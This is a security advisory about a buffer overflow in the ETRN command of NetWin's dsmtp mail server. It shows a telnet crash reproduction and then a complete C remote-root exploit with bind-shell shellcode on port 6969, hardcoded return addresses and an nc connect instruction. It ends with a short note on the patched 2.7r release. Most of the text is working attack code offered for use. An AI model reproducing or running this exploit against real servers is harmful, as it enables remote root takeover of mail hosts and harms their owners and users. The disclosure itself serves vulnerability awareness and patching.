COMMAND

    dsmtp

SYSTEMS AFFECTED

    DMailWeb

PROBLEM

    Eric  Andry  found  following.   He's  been  sitting on this for a
    while,  but  dsmtp  (part  of  the  dmail package by NetWin) has a
    buffer overflow in the ETRN  command, causing the server to  crash
    and dump core.

        NotNow>telnet localhost 25
        Trying 127.0.0.1...
        Connected to localhost.
        Escape character is '^]'.
        220 myhost.mydomain DSMTP ESMTP Server v2.8g
        EHLO ""
        250-myhost.mydomain. Hello "" (127.0.0.1)
        250-ETRN
        250-DSN
        250 HELP
        ETRN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        Connection closed by foreign host.
        NotNow>
        NotNow>cd /usr/local/dmail
        NotNow>ls -la core
        -rw-------   1 root     root      1961984 Jun  1 13:42 core
        NotNow>

    A little over 260 A's would cauase the crash.  Tested on V.  2.8d,
    e,  f,  and  g.  All  are  Beta Releases, never tested on "stable"
    versions.  Here's the exploit:

    /*
    Netwin DSMTP Server v2.7q remote-root exploit
    noir@gsu.linux.org.tr | noir@olympos.org

    tested arch = x86/Linux mdk7.0
    I will port this to Solaris & FreeBSD when I have time...
    check http://gsu.linux.org.tr/~noir/ offsets for other Linux distros.

    greetz: moog, si_ (happy birthday!), CronoS, still, teso crew,
    gsu-linux, `B, calaz, olympos secteam

    FOUND BY Eric Andry eric@wincom.net
    */
    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>
    #include <stdlib.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/time.h>


    unsigned char shellcode[]=  /* noir@olympos.org */
    "\x31\xc0\x40\x40\x89\x45\xf4\x48\x89\x45\xf8\x48\x89"
    "\x45\xfc\xb0\x66\x31\xdb\x43\x8d\x4d\xf4\xcd\x80\x31"
    "\xdb\x43\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1b\x39"
    "\x31\xdb\x89\x5d\xf0\x89\x45\xf4\x89\xc2\x8d\x45\xec"
    "\x89\x45\xf8\xc6\x45\xfc\x10\x31\xc0\xb0\x66\x31\xdb"
    "\xb3\x02\x8d\x4d\xf4\xcd\x80\x89\x55\xf8\x31\xc0\x40"
    "\x89\x45\xfc\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x8d\x4d"
    "\xf8\xcd\x80\x89\x55\xf4\x31\xc0\x89\x45\xf8\x89\x45"
    "\xf8\x89\x45\xfc\xb0\x66\x31\xdb\xb3\x05\x8d\x4d\xf4"
    "\xcd\x80\x89\xc2\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xcd"
    "\x80\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xb1\x01\xcd\x80"
    "\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xb1\x02\xcd\x80"
    /* generic shellcode execve(args[0],args,0);  aleph1 */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";




    int resolv(char *hname, struct in_addr *addr);

    #define RET_MDK70    0xbfff97ec
    #define RET_REDHAT60 0xaabbccdd
    #define RET_SLACK70  0xddccbbaa
    #define NOP 0x90
    #define ALIGN 1

    int
    main(int argc, char *argv[])
    {

            int fd, n;
            int i, l;
            unsigned char ovf[860];
            char buff[200];
            int offset = 0;
            struct sockaddr_in servaddr;
            if (argc < 2 ){
            fprintf(stderr,"%s <host> [offset]\n",argv[0]);
            exit(0);
            }
          if(argv[2])
             offset=atoi(argv[2]);
    printf("Netwin DSMTP v2.7q remote-root exploit by noir\n");
            if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
            perror("socket");
            exit(-1);
            }

            bzero(&servaddr, sizeof(servaddr));
            servaddr.sin_family = AF_INET;
            servaddr.sin_port = htons(25);
            if(!resolv(argv[1], &servaddr.sin_addr)){
            herror("gethostbyname");
            exit(-1); }

            if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
            perror("connect");
            exit(-1);
            }

            n = read(fd, buff, 1024);
            write(STDOUT_FILENO, buff, n);
            sleep(2);
            fprintf(stderr, "check for portshell 6969/tcp when done\n");

            memset(ovf, NOP, sizeof(ovf));
            for( i = ALIGN; i < 300; i+=4)
            *(long *) &ovf[i] = RET_MDK70 + offset;
            for( i = 650, l = 0; l < strlen(shellcode) ;i++, l++)
            ovf[i] = shellcode[l];
            memcpy(ovf, "ETRN ", 5);
            strcpy(ovf+858,"\r\n\0");
            write(fd, ovf, strlen(ovf));
            fprintf(stderr,"done!\n$ nc %s 6969\n", argv[1]);
            return 1;
    }

    int
    resolv(char *hname, struct in_addr *addr)
    {
            struct hostent *hp;

    if ( (hp = gethostbyname(hname)) == NULL)
            return 0;

      memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr));
            return 1;
    }

SOLUTION

    Netwinsite released  a new  version of  Dmail -  2.7r which  fixes
    this exploit. It is available at

        ftp://ftp.netwinsite.com/pub/dmail/

    Currently, there are only Linux and Solaris versions available.